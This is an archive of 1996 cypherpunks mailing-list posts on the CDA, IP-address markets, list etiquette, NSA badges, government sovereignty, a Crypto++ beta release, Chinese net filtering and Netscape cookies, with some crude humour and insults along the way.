Subject: Re: Put the Protest where your money is.
In-Reply-To: <199602130229.SAA10506@mark.allyn.com>
Message-ID: <Pine.SUN.3.91.960213122532.19788A-100000@dorsai>
MIME-Version: 1.0
Content-Type: text/plain


On Mon, 12 Feb 1996, Mark Allyn (206) 860-9454 wrote:

> What do you mean by a speech bubble?
> 
> "write in a speech bubble to the president dude"
> 
> Does this mean a transparent plastic bubble over his head??

Like in comic books.  i.e:
         __________________________________
        /CDA is unconstitutional and sucks \
       | Exon sucks rhino dick for lunch    |
   ___  \ _________________________________/
  /   \ |/
  |O O|
  \ ^ /
   -~-

:-)

==========================================================================
 + ^ + |  Ray Arachelian |Emptiness is loneliness, and loneliness|  _ |>
  \|/  |sunder@dorsai.org|is cleanliness  and cleanliness is god-|  \ |
<--+-->|                 |liness and god is empty,  just like me,|   \|
  /|\  |    Just Say     |intoxicated  with the maddness,  I'm in|   <|\
 + v + | "No" to the NSA!|love with my sadness.   (Pumpkins/Zero)|   <| n
===================http://www.dorsai.org/~sunder/=========================


[This Bible excerpt awaiting review under the Communications Decency Act]
And then Lot said, "I have some mighty fine young virgin daughters. Why
don't you boys just come on in and do em right here in my house - I'll just
watch!"....Later, up in the mountains, the younger daughter said. "Dad's
getting old. I say we should do him." So the two daughters got him drunk and
did him all that night. Sure enough, Dad got em pregnant....Onan really
hated the idea of doing his brother's wife and getting her pregnant while
his brother got all the credit, so he whacked off first....Remember, it's
not a good idea to have sex with your sister, your brother, your parents,
your pet dog, or the farm animals. [excerpts from the Old Testament, Modern
Vernacular Translation, TCM, 1996] 






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Alan Olsen <alano@teleport.com>
Date: Wed, 14 Feb 1996 12:36:35 +0800
To: John Gilmore <gnu@toad.com
Subject: Re: AT&T Public Policy Research -- hiring for cypherpunks issues
Message-ID: <2.2.32.19960213203230.00af30dc@mail.teleport.com>
MIME-Version: 1.0
Content-Type: text/plain


At 03:21 AM 2/13/96 -0800, John Gilmore wrote:
>Date: Mon, 12 Feb 1996 17:02:39 -0500 (EST)
>From: Paul Resnick <presnick@research.att.com>
>To: gnu@eff.org
[Snip]
>Markets for IP Addresses
>
>The 32-bit numbers used for Internet addressing and routing are a
>limited resource. As this resource becomes scarcer, political
>considerations are likely to creep into allocation decisions made
>through existing administrative processes, leading to suboptimal
>allocations. By granting transferable property rights to addresses,
>allocation decisions can be removed from the political realm into the
>economic realm, so that addresses are allocated to those who value them
>most. This project seeks to develop consensus in the Internet community
>for a move to market-based allocation, and investigates alternative
>designs for an electronic market to coordinate the exchange of IP
>addresses.

This proposal bothers me. I do not see any positive results from this
proposal. (Or at least the negatives will far outweigh the positive.)

Here is what I see as the results of such a plan...

Getting an IP address will become prohibitivly expensive except for the
largest megacorps.  Instead of solving the limitations of the current
system, this plan will cause people to "invest" in IP addresses in the hope
that the price will go up.  IP addresses will become part of a corporation's
invenstment portfolio.  This will result in less usage of IP addresses, not
more.  The Internet is a fully complient buzzword.  People will buy IP
addresses becuase it is "the cool thing to do" and they can make a quick buck.

I wonder if "used" addresses will get less money on the "open market" than
"unused" addresses.  If that is the case, then the you will see huge blocks
of addresses go unused so as to not spoil their "market value".

All in all, I see it as a bad idea...

"Ever have a problem getting an IP address from your local ISP?  YOU WILL!
And the poeple to bring it to you? AT&T!"
 
---
Alan Olsen -- alano@teleport.com -- Contract Web Design & Instruction
        `finger -l alano@teleport.com` for PGP 2.6.2 key 
                http://www.teleport.com/~alano/ 
  "We had to destroy the Internet in order to save it." - Sen. Exon
"I, Caligula Clinton... In the name of the Senate and the people of Rome!"
   - Bill Clinton signing the CDA with the First Amendment bent over.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Perry E. Metzger" <perry@piermont.com>
Date: Wed, 14 Feb 1996 09:19:01 +0800
To: cypherpunks@toad.com
Subject: Re: DEA
In-Reply-To: <199602130154.CAA23267@utopia.hacktic.nl>
Message-ID: <199602131752.MAA21256@jekyll.piermont.com>
MIME-Version: 1.0
Content-Type: text/plain



Okay, Anonymous: what does DEA corruption have to do with Cypherpunks?

Anonymous writes:
> Column by Jim Dykes 
> in the Knoxville Journal (423-584-9606), 2/8/96.
> 
> 
> (...) I had a call the other day.  About the DEA.  Try to keep
> all these damn acronyms straight:  DEA is Drug Enforcement
> Agency.
> 
> Call was from an old cowboy - well, former Air America pilot, to
> be more precise, CIA.  (There should be a federal agency to
> control us old men better.)
[...]




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jeff Barber <jeffb@sware.com>
Date: Wed, 14 Feb 1996 08:51:59 +0800
To: sunder@dorsai.dorsai.org (Ray Arachelian)
Subject: Re: META: Filtering/Posting advice
In-Reply-To: <Pine.SUN.3.91.960213120407.18735B-100000@dorsai>
Message-ID: <199602131802.NAA22343@jafar.sware.com>
MIME-Version: 1.0
Content-Type: text/plain


Ray Arachelian writes:

> So there are options for those who want less noise.  I do not beleive it 
> is anyone's place to banish anyone from posting to the list, nor grading 
> a person's worth based on past posts.

Every one of us "[grades] a person's worth based on past posts" and
this is as it should be.  That's why my finger hovers only nanometers
above the 'd' key when I see a post from, say, Vlad the Imposter.


-- Jeff




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "E. ALLEN SMITH" <EALLENSMITH@ocelot.Rutgers.EDU>
Date: Wed, 14 Feb 1996 10:02:25 +0800
To: declan+@CMU.EDU
Subject: Re: Spin Control Alert (LI Newsday, 2/12/96)
Message-ID: <01I15ZHN65A0A0V0R0@mbcl.rutgers.edu>
MIME-Version: 1.0
Content-Type: text/plain


From:	IN%"declan+@CMU.EDU"  "Declan B. McCullagh" 13-FEB-1996 00:19:48.79

>Exactly. Catharine MacKinnon, for instance, has called the EFF and other
>Rimm-debunkers part of the "pro-pornography power block" which
>represents the "howling fury of the pornographers protecting their
>penises and their wallets."

	So Catharine MacKinnon wants to castrate and steal from men? No
surprise... Excellent quote to repeat, BTW... it might even get
the male followers of the Christian Coalition et al to question with whom
they're working. 

>ObCrypto: Yes, Know Your Enemies and work with the natural enemies of
>the religious right, such as groups like the ACLU and the FEN. The
>theocratic push to outlaw nonescrowed crypto is next.

	As I said before about the CPSR and libertarians (and Rush Limbaugh and
libertarians), politics makes strange bedfellows.
	-Allen




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "E. ALLEN SMITH" <EALLENSMITH@ocelot.Rutgers.EDU>
Date: Wed, 14 Feb 1996 10:16:35 +0800
To: cypherpunks@toad.com
Subject: Australian net limitations
Message-ID: <01I15ZWKBYJ8A0V0R0@mbcl.rutgers.edu>
MIME-Version: 1.0
Content-Type: text/plain


	This may have some relevance to the Australian crypto regulation
thread a while back.
	-Allen

From:	IN%"rre@weber.ucsd.edu" 12-FEB-1996 23:51:48.10

=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
This message was forwarded through the Red Rock Eater News Service (RRE).
Send any replies to the original author, listed in the From: field below.
You are welcome to send the message along to others but please do not use
the "redirect" command.  For information on RRE, including instructions
for (un)subscribing, send an empty message to  rre-help@weber.ucsd.edu
=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=

Date: Sun, 11 Feb 1996 18:28:44 -0800
From: madanmohan rao <rao@IGC.APC.ORG>
To: "Multiple recipients of list india-gii@cpsr.org"
     <errors@snyside.sunnyside.com>
Subject: Internet news about Asia, India

Hello folks -
 
     Here are excerpts from this week's edition of my column,
"International Internet NewsClips." The full version plus
archives are at MecklerMedia's Internet World site
(http://www.iworld.com/netday/NATW.html). You can also find my
reviews of books on Internet-related subjects at this site.
     Comments, feedback, etc. most welcome as always.
                                                      - madan
______________________________________________________________
  Madanmohan Rao (rao@igc.org), Communications Consultant, 
     United Nations Inter Press Service bureau.
--------------------------------------------------------------
 
[...]

Internet Legislation To Be Formulated In Australia
--------------------------------------------------
1996 is probably going to be a watershed year in Australian
Internet history. Decisions are going to be made about what is
and is not allowable on-line. Concerned users will have a chance
to express their opinions to the Australian Broadcasting
Association's On-line Services Investigation, by February 16. 
The ABA's is the second similar investigation in the last six
months. A Senate report last November argued that it should be an
offence to "transmit, obtain possession of, demonstrate,
advertise or request the transmission of material equivalent to
RC (refused classification), R or X categories." But this would
mean that the on-line world would be restricted by tighter
standards than the off-line world. The ABA has issued a
comprehensive Issues Paper for its inquiry (http://www.dca.gov.
au/aba/olsissue.htm). Available since December, the paper deals
with the concepts of codes of practice, the development of a
representative industry body, the establishment of an independent
complaints-handling body and other mechanisms for controlling
access in the on-line environment. It also looks at consumer and
Australian content issues on the Net, provides a handy guideline
to censorship classification, and a summary of the findings of
the Office of Film and Literature Classification's own informal
search of the Net - 27 hours of porn hunting yielded the
discovery that "restricted and refused classification material
was difficult to find, at times difficult to download, and was
more prevalent on Usenet newsgroup files than on the World Wide
Web." The ABA accepts submissions by e-mail (online@aba.gov.au).
(Sydney Morning Herald; February 6, 1996)
 
Nations See Internet As Cultural, Political, Economic Threat
------------------------------------------------------------
Nations are discovering that data sent via the Internet can be
every bit as threatening to a country's laws or its culture as
the armies of yesteryear. "Nation states are trying to assert
themselves with increasing aggression into cyberspace," said
Electronic Frontier Foundation's John Perry Barlow, at the World
Economic Forum in Davos, Switzerland. It's not just cultural or
social sovereignty that governments worry about. The power to tax
is also being eroded by the increase in economic transactions
that take place over the Internet, some of it encrypted so that
prying eyes of the tax department could not read them. "You can't
control it, it's uncontrollable," said MIT's Nicholas Negroponte.
"If someone tells you that you can, they are probably smoking
pot."
(Toronto Globe and Mail; February 3, 1996)




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Perry E. Metzger" <perry@piermont.com>
Date: Wed, 14 Feb 1996 10:14:06 +0800
To: Leslie Todd Masco <cactus@hks.net>
Subject: Re: Cypherpunks vs. Coderpunks
In-Reply-To: <199602130525.AAA24031@bb.hks.net>
Message-ID: <199602131829.NAA21286@jekyll.piermont.com>
MIME-Version: 1.0
Content-Type: text/plain



Leslie Todd Masco writes:
> My concern is that the two lists will become more disjoint than they
> already are.  I believe that the content of Cypherpunks is enhanced
> by having the programmers present, just as the coders benefit from
> the guidance of seeing the possibilities opened by their endeavors.

I agree and would like to amplify.

I'm really sick of the folks who can post to libernet, com-priv,
talk.politics.guns, etc, pissing on the parade.

The thing that makes Cypherpunks worthwhile is that its a place where
you could, once, get news updates about GAK, information on the latest
research into cryptography, organize mass key crackings, discuss APIs,
talk a bit about the politics of cryptography, etc.

Now, we get anonymous posters putting up bits on corruption in the
DEA, sections of Tsutomu Shimomura's sex life, and other garbage. I
don't give a damn if you think "Perry's a whining asshole; no one
appointed him God", the stuff I'm mentioning is almost totally
irrelevant to the topic at hand. (I *still* see no relevance to the
late great Kevin Mitnick discussion, and frankly, I don't give a damn
if he's in jail.) I also really am not impressed enough with the
justification for why Jim Bell's "ideas" need to be discussed here.

For some people without jobs (I won't name names) there is no problem
with this. However, some of us have trouble keeping up, and
unfortunately Cypherpunks has content that is key to our work and
interests. 

Sadly, there isn't another place with the momentum where people are a
bit more polite and talk about the same information.

Yet.

Perry




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "E. ALLEN SMITH" <EALLENSMITH@ocelot.Rutgers.EDU>
Date: Wed, 14 Feb 1996 10:52:45 +0800
To: cactus@hks.net
Subject: Re: Cypherpunks vs. Coderpunks
Message-ID: <01I16036OIWSA0V0R0@mbcl.rutgers.edu>
MIME-Version: 1.0
Content-Type: text/plain


From: Leslie Todd Masco <cactus@hks.net>

>My concern is that the two lists will become more disjoint than they
>already are.  I believe that the content of Cypherpunks is enhanced by having
>the programmers present, just as the coders benefit from the guidance of
>seeing the possibilities opened by their endeavors.

>The remailers network is the most obvious example of the benefits of this
>synergy. I'd hate to see us lose later rewards that could otherwise be reaped.

	I would agree about this. However, hopefully some of the pure-coding
stuff (such as the timing of sun speeds or whatever thread) can be moved to
coderpunks for the sake of those on here who aren't interested... and who are
also the least likely to have an easy filter to use.
	-Allen




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Perry E. Metzger" <perry@piermont.com>
Date: Wed, 14 Feb 1996 18:30:53 +0800
To: tcmay@got.net (Timothy C. May)
Subject: Re: LI Newsday OpEd: Criminal Justice System
In-Reply-To: <ad45438f01021004bc0a@[205.199.118.202]>
Message-ID: <199602131833.NAA21297@jekyll.piermont.com>
MIME-Version: 1.0
Content-Type: text/plain



Timothy C. May writes:
> Au contraire. Those interested in pure cryptography and coding are over in
> Coderpunks, the new gated community for such folks.
> 
> The rest of us, stuck here in the ghetto of Cypherpunks, will talk about
> what we want to talk about.

Tim, you don't work for a living. Some of us do. You might try to
think back and remember what it was like in the days when you still
did something every once in a while and had a limited amount of time
available in which to do it.

Perry




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Scott Brickner <sjb@universe.digex.net>
Date: Wed, 14 Feb 1996 13:38:10 +0800
To: cypherpunks@toad.com
Subject: Re: Secrecy of NSA Affiliation
In-Reply-To: <3107db204068002@noc.cis.umn.edu>
Message-ID: <199602131959.OAA16076@universe.digex.net>
MIME-Version: 1.0
Content-Type: text/plain


Kevin L Prigge writes:
>Timothy C. May said:
>> When I attended Crypto '88, nearly 8 years ago, at least several of the NSA
>> attendees had "National Security Agency" on their name badges. It may be
>> that run-of-the-mill employees still maintain the fiction  for public
>> consumption that they are DOD employees, but such was not the case in 1988
>> at "Crypto."

This sounds about right.  When I was an NSA employee ('83), our
introductory briefing included the suggestion (I don't recall it being
phrased as a command command) that we identify ourselves as DoD.  It
was suggested that this might lessen our visibility as espionage
targets.

At the time, the brass would likely have been identified as NSA, as
were the lesser brass in the National Computer Security Center, but
regular employees weren't.

>At the RSA conference last week, there were approximately 10 people from
>the NSA. Only 2 of those were registered as DOD, the rest were NSA. I
>mentioned this at lunch to a guy from the NSA, and he said that only
>oldtimers do the DOD identification anymore.

Yikes.  Sometimes age creeps up on you when you aren't looking.  I
guess I'd be an "oldtimer" if I were still working there?  An
"oldtimer" at thirty-three... hmm.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: lunaslide@loop.com
Date: Wed, 14 Feb 1996 18:12:14 +0800
To: "A. Padgett Peterson P.E. Information Security"	 <PADGETT%TCCSLR@emamv1.orl.mmc.com>
Subject: Re: Re:
Message-ID: <v01530500ad46ac310982@[206.138.116.153]>
MIME-Version: 1.0
Content-Type: text/plain


}>sovereign n. 1. A person, governing body, etc., in whom the >supreme power
}>or authority is vested.<  adj. 1. Exercising or possessing supreme
}>authority or jurisdiction.  2. Independent, and free from external
}>authority or influence: a sovereign state.
}
}Yup.
}
}>This is not what our government is.
}
}The United States is a sovereign nation. Do you dispute that ? The
}constitution is a binding agreement between the government and its citizens
}that determines how that sovereignty will be exercised, the elements in which
}the nation will not interfere with citizens, and the duties which it will
}carry out.

<rm>

Yes, I do dispute it, but I'm not going to write why all over again, since
you seem to have convieniently snipped the rest of my post, rather than
answer it.  You are arguing a straw man.  I didn't say that the nation
isn't soveriegn, I said that the government is not sovereign.  Yes, there
is a difference.

lunaslide

"Prohibition... goes beyond the bounds of reason in that it attempts to
control a man's appetite by legislation and makes a crime out of things
that are not crimes... A prohibition law strikes a blow at the very
principles upon which our government was founded."
- -- Abraham Lincoln

On the meridian of time there is no injustice, only the poetry of motion
creating the illusion of truth and drama.
                                                Henry Miller
________________________________________________________________

-----BEGIN PGP PUBLIC KEY BLOCK-----
Version: 2.6.2

mQCPAzEX3QEAAAEEAOGQjhnqGH29pO1WDaXs5GFOVPhCBWyYEk9XEwRmscjveWzH
AhA6DeOA480zWNqQURyqE2yPmR8WzT+OXYqmeiQiycKyFA41Vs/Ruf+gXXxe7uXS
L5BK3K8oKbfoH0D5/TAkMT4r6BprXFQz4pFc3gY2SSaSPElpMjKHaKBsRsyRABEB
AAG0HUplZmYgQ29ubiA8bHVuYXNsaWRlQGxvb3AuY29tiQCVAwUQMRffHzKHaKBs
RsyRAQGNhwP9E9xEZ9/LCKnhgtnrqgD7pDoXG2pCy8FoyfFjoImGkG+jF1wELXmB
Z0mf8F8CgYkys0mif1XeGDMelr1gzlZAm6LgQt4kcvztMW/aRLn18QP+iwltVT/L
p8D37mitOjvuk46sWgAChIaPPPIeg/EaYQjQkmlpWKsEYIoTRy+E8mU=
=4Gku
-----END PGP PUBLIC KEY BLOCK-----








From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: lunaslide@loop.com
Date: Wed, 14 Feb 1996 14:28:04 +0800
To: "A. Padgett Peterson P.E. Information Security"	 <PADGETT%TCCSLR@emamv1.orl.mmc.com>
Subject: Re: Re:
Message-ID: <v01530500ad46b5aec2ac@[204.179.169.44]>
MIME-Version: 1.0
Content-Type: text/plain


}>sovereign n. 1. A person, governing body, etc., in whom the >supreme power
}>or authority is vested.<  adj. 1. Exercising or possessing supreme
}>authority or jurisdiction.  2. Independent, and free from external
}>authority or influence: a sovereign state.
}
}Yup.
}
}>This is not what our government is.
}
}The United States is a sovereign nation. Do you dispute that ? The
}constitution is a binding agreement between the government and its citizens
}that determines how that sovereignty will be exercised, the elements in which
}the nation will not interfere with citizens, and the duties which it will
}carry out.

No, but I do dispute that the _U.S. Government_ is sovereign.  I'm not
going to write why all over again, since you seem to have convieniently
snipped the rest of my post, rather than answer it.  You are commiting a
straw man fallacy.  I didn't say that the nation isn't soveriegn, I said
that the government is not sovereign.  Yes, there is a difference.

}The three branches of the government were set up to ensure that "supreme
}power" would never rest with a single entity, yet taken together they do have
}that power.


The three branches are a system of checks and balances to counter the the
immergence of one sovereign pwoer.  See, it is actually built into the
constution that the govt cannot be sovereign!

}Congress and the Senate are the legally empowered representatives of the
}people. In that they do have the "power of the people" to make decisions
}on what is right and what is wrong within limits. That too is defined in
}the constitution.

The Congress is the Senate and the House, and they are given specific
powers by the people to govern themselves in relation to the job in Article
1, Sections 1-7 and to govern the people in Article 1, Sections 8-10.  The
powers given are very specific in nature and involve mostly limited
legislative powers and taxing abilities.

The President is given his rights and duties to govern the people in
Article 2, Sections 2 and 3 and they include the power to command the army
and navy, give pardons, make treaties and appoint people to positions as
Judges, Ambassadors and the like.  He has the duty to give a State of the
Union address from "time to time" to inform and ask for recomendation and
consideration on matters ofhis choosing.  He also has the right to conviene
both houses of congress to discuss matters.

In Article one, he is also given the power of the veto.

The Judicial branch, and particularly the Supreme Court, is given the power
to rule on matters concerning the court involving laws and disputes.  They
have the power to refute laws and the duty to adhere to the principles of
the constitution.

The people have the right to dissent and may petition the govt for a
redress of grievances as dictated by Amendment one.  If they are not given
satisfaction, they still have the right to free speech and press so that
they may share their dissent with one another and affect the outcome of the
next election.

The Fourth Amendment, of course, protects the "...right of the people to be
secure in their persons, houses, papers, and effects against unreasonable
searches and seizures..."  Clearly the govt cannot be sovereign if this is
true.

}Take the CDA. I do believe that it is unconstitutional but that Congress/
}Saxplayer had the *right* to pass the law just as the Supreme Court has the
}right to declare it to have been outside the power of the Congress to do so
}(which I expect). Somehow it works.

But ultimately it is the people who decide, and the people are not one with
the government.  The people have influence over the government, therefore
the government cannot be sovereign.

The first part of the Declaration of Independence indicates that it was
never the intent of the founding fathers to create a sovereign government,
refuting your nonsensical statement about it being "a given."

I ended up restating almost my whole case anyway.  But that's ok, cause
I'll just keep explaining until you understand it.

lunaslide

"Prohibition... goes beyond the bounds of reason in that it attempts to
control a man's appetite by legislation and makes a crime out of things
that are not crimes... A prohibition law strikes a blow at the very
principles upon which our government was founded."
- -- Abraham Lincoln

On the meridian of time there is no injustice, only the poetry of motion
creating the illusion of truth and drama.
                                                Henry Miller
________________________________________________________________

-----BEGIN PGP PUBLIC KEY BLOCK-----
Version: 2.6.2

mQCPAzEX3QEAAAEEAOGQjhnqGH29pO1WDaXs5GFOVPhCBWyYEk9XEwRmscjveWzH
AhA6DeOA480zWNqQURyqE2yPmR8WzT+OXYqmeiQiycKyFA41Vs/Ruf+gXXxe7uXS
L5BK3K8oKbfoH0D5/TAkMT4r6BprXFQz4pFc3gY2SSaSPElpMjKHaKBsRsyRABEB
AAG0HUplZmYgQ29ubiA8bHVuYXNsaWRlQGxvb3AuY29tiQCVAwUQMRffHzKHaKBs
RsyRAQGNhwP9E9xEZ9/LCKnhgtnrqgD7pDoXG2pCy8FoyfFjoImGkG+jF1wELXmB
Z0mf8F8CgYkys0mif1XeGDMelr1gzlZAm6LgQt4kcvztMW/aRLn18QP+iwltVT/L
p8D37mitOjvuk46sWgAChIaPPPIeg/EaYQjQkmlpWKsEYIoTRy+E8mU=
=4Gku
-----END PGP PUBLIC KEY BLOCK-----








From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Wei Dai <weidai@eskimo.com>
Date: Wed, 14 Feb 1996 13:58:39 +0800
To: coderpunks@toad.com
Subject: Crypto++ 2.0 beta
In-Reply-To: <199512031725.LAA03163@duracef.shout.net>
Message-ID: <Pine.SUN.3.91.960213140152.10671D-100000@eskimo.com>
MIME-Version: 1.0
Content-Type: text/plain


I'm about to release version 2.0 of Crypto++, and I am looking for people 
to do some beta testing on it.  I'm especially interested in testing for 
compatibility with different compilers/OSs.  If you are interested, 
please e-mail me stating that you are a US or Canadian citizen or 
permanent resident living in US or Canada and that you will not export 
the software.

Wei Dai

Here's the readme for Crypto++ if you don't know what it is.

Crypto++: a C++ Class Library of Cryptographic Primitives
Version 2.0 beta   2/13/1996

This library includes:

MD5, SHS, HAVAL, DES, IDEA, WAKE, 3-WAY, TEA, SAFER, Blowfish, 
Diamond2, Diamond2 Lite, Sapphire, Luby-Rackoff, MDC, various 
modes (CFB, CBC, OFB, counter), DH,  DSA, ElGamal, LUC, Rabin,
BlumGoldwasser, elliptic curve cryptosystems, BBS, gzip 
compression, Shamir's secret sharing scheme, Rabin's information 
dispersal scheme, and zero-knowledge prover and verifier for
graph isomorphism.  There are also various miscellanous modules such 
as base 64 coding and 32-bit CRC.

RSA and RC5 are noticeably absent.  I am still talking to RSA
DSI about adding them back into Crypto++.  I hope version 2.1
will include them.

Crypto++ has been compiled and tested with Borland C++ 4.5, MSVC 4.0, 
and G++ 2.7.2 on MS-DOS, Windows NT, and a variety of Unix machines.
You are welcome to use it for any purpose without paying me, but see
license.txt for the fine print.

           
Some short instructions to compile this library:
(you probably need to modify this to suit your environment)


-- if want to use this library with RSAREF, then

1. get a copy of RSAREF

2. untar or unzip it into a directory below this one

3. type "gcc -c -I. *.c" (in the rsaref/source directory) to compile RSAREF

4. edit config.h

5. type "g++ -c -Irsaref/source -I. *.cpp" to compile this library

6. type "g++ *.o rsaref/source/*.o -lstdc++ -lm" to link the test driver

7. type "a.out" to run the test driver


-- if you DON'T want to use this library with RSAREF, then

1. edit config.h (make sure to comment out #define USE_RSAREF)

2. type "g++ -c *.cpp" to compile this library

3. type "g++ *.o -lstdc++ -lm" to link the test driver

4. type "a.out" to run the test driver


Finally, a note on object ownership:  If a constructor for A takes 
a pointer to an object B (except primitive types such as int and char),
then A owns B and will delete B at A's destruction.  If a 
constructor for A takes a reference to an object B, then 
the caller retains ownership of B and should not destroy it until A no 
longer needs it.

Good luck, and feel free to e-mail me at weidai@eskimo.com if you have
any problems.  Also, check http://www.eskimo.com/~weidai/cryptlib.html
for updates and new versions.

Wei Dai

History

1.0 - First public release.  Withdrawn at the request of RSA DSI.
    - Has a big bug in the RSA key generation code.

1.1 - Removed RSA, RC4, RC5
    - Disabled calls to RSAREF's non-public functions
    - Minor bugs fixed

2.0 - a completely new, faster multiprecision integer class
    - added HAVAL, 3-WAY, TEA, SAFER, LUC, Rabin, BlumGoldwasser, 
Elliptic Curve
      algorithms
    - added the Lucas strong probable primality test
    - ElGamal encryption and signature schemes modified to avoid weaknesses
    - Diamond changed to Diamond2 because of key schedule weakness
    - fixed bug in WAKE key setup
    - lots of miscellaneous optimizations





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: daw@dawn7.CS.Berkeley.EDU (David A Wagner)
Date: Wed, 14 Feb 1996 13:51:07 +0800
To: cypherpunks@toad.com
Subject: Re: Firewall USA to Firewall China
Message-ID: <199602132225.RAA29121@bb.hks.net>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

In article <199602130139.RAA11162@mage.qualcomm.com>,
Peter Monta <pmonta@qualcomm.com> wrote:
> > [ Jim Clark, "Firewall China" ]
> >
> >   A: A lot of people think that's not possible. It's difficult to enforce,
> >   but it's certainly possible. A corporation has a so-called fire wall -- a
> >   single point of entry into the corporate net. You can have a country
> >   that has a single point of entry into its "country net." It's doable. All
> >   you need, though, is one breach of security, and there's a leak.
> > 
> >   A fire wall is a filter -- it filters and doesn't let certain people come in.
> >   You can only come in if you have the right permission. So you could
> >   easily set that up so that it would filter out your objectionable
> >   material.
> 
> He seems to be confusing network security with the propagation of content.
> A firewall is going to have a lot more trouble filtering dangerous
> thoughts than UDP port 1234, unless there are humans in the loop.

Hmm, I'd argue that firewall technology would indeed let China filter
out many "subversive" thoughts on the Internet.

The firewall is not going to be able to stop the two-rogue problem:
two technically knowledgeable rogue agents, one on each side of the
firewall, *will* succeed in communicating dangerous thoughts if they
try hard enough.  But that's not so important to solve perfectly,
in practice.

No, in reality, China could set up a few simple application proxies
and only allow world -> China traffic on a few closely controlled
ports, such as http, smtp, nntp, ftp, etc.  The proxies could

* filter out "naughty" and "seditious" sites (e.g. www.playboy.com),
* filter out email, news, etc. which has traversed
  a "known dangerous site" (e.g. a remailer or ftp.hacktic.nl),
* daily update their lists of subversive sites
  (e.g. by reading Raph's remailer list),
* filter out indecent newsgroups,
* do simple keyword searches (e.g. fuck, revolution, protest, crypto),
  and/or
* do simple content analysis
  (e.g. maybe filter out .gifs, to stop nude pics).

This would hose 93% of the subversive stuff on the 'net.

"Social solutions" (read: men with guns) can eliminate the last 7%.

And so it goes.

Sure, someone in the "free world" (e.g. not China or the USA) could run
a remailer / http-proxy at a new site each day, enabling someone knowledgeable
in China to find dangerous material.  But the fact remains that this
requires technical knowledge and the willingness to go to the trouble of
actively accessing the remailer site.

Again, someone in the China could run a remailer / reposter / http-proxy
themselves inside the firewall; that's where the "social solutions" come in.
Kick down the door (see, jackboots are good for something after all!), beat
up the children, and you can kiss that remailer goodbye.

Technically, you're right in saying that you can't filter all the content
perfectly; it's the classic covert channel problem.  But practically, the
Chinese gov't can probably wreak havoc with 'net freedom in China.

- -- Dave Wagner
Fuck the CDA.
- ---
[This message has been signed by an auto-signing service.  A valid signature
means only that it has been received at the address corresponding to the
signature and forwarded.]

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2
Comment: Gratis auto-signing service

iQBFAwUBMSEPwyoZzwIn1bdtAQEFDAF9GXWLz9beaciHbY3mo3Reaom7K5IK0k2I
pVz5NrHqa80eDtC8Rr0w/kSzkKtq4GCL
=k93A
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Peter Monta <pmonta@qualcomm.com>
Date: Wed, 14 Feb 1996 16:34:22 +0800
To: cypherpunks@toad.com
Subject: Re: AT&T Public Policy Research -- hiring for cypherpunks issues
In-Reply-To: <2.2.32.19960213203230.00af30dc@mail.teleport.com>
Message-ID: <199602140212.SAA18926@mage.qualcomm.com>
MIME-Version: 1.0
Content-Type: text/plain


Alan Olsen writes:

> [ AT&T, markets for IP addresses ]

What's the point, given that IPv6, with 128-bit addresses (and IP
security), is in the pipeline?  The IPv4 issue isn't *that* pressing.

Peter Monta   pmonta@qualcomm.com
Qualcomm, Inc./Globalstar





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "David E. Smith" <dsmith@midwest.net>
Date: Wed, 14 Feb 1996 15:18:25 +0800
To: "Deranged Mutant" <WlkngOwl@UNiX.asb.com>
Subject: Re: Netscrape's Cookies
Message-ID: <2.2.32.19960214003255.00687914@204.248.40.2>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

At 04:18 PM 2/13/96 +0000, a Deranged Mutant wrote:

[re cookies! yum]

>I'm curious if anyone knows which sites use/modify it.
AFAIK, the only site that uses it is *.netscape.com

dave



-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQEVAwUBMSEtFjVTwUKWHSsJAQHkJAf9EaG4gSj6zJLLcI6wiT6Qd45yBPL2sxIW
M8Vtf95bLgCM7h0BP6jtdUGRG0nMVqbY/Xj+kNYfDHmgZSnuoBrYld9E4bs5puTr
aVW6y7UBs3hdqz5dtWh4Gn2nq6/xTkj/t3/DlI/fuakNVnTlN0TeGPj2Alp5x8Z3
mww1gQ0EyymlioPEpyaNqg8vGSVcltDOQRdw+7HZoc2fZ6urvBkDKtHRAtN7PiUG
LMafuM+27TiRoKi1kSf0Q1S6EE7QrXoJTnTm6/qAIY1e+kPw/Lg17NhJmIQR0TnT
tSzucfxzjrGvFGI2fZL0kr5qAe/k/eqx+xKNXZHJjsNWIG8/WbdiPQ==
=dpvR
-----END PGP SIGNATURE-----
-----
David E. Smith,  c/o Southeast Missouri State University
1000 Towers Circle South MS 1210 Cape Girardeau MO 63701
dsmith@midwest.net, dsmith@alpha.c2.org,  PGP 0x961D2B09
(573)339-3814    http://www.midwest.net/scribers/dsmith/
"Reality is only for those lacking in true imagination."




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Alan Olsen <alano@teleport.com>
Date: Wed, 14 Feb 1996 17:15:18 +0800
To: "David E. Smith" <WlkngOwl@UNiX.asb.com>
Subject: Re: Netscrape's Cookies
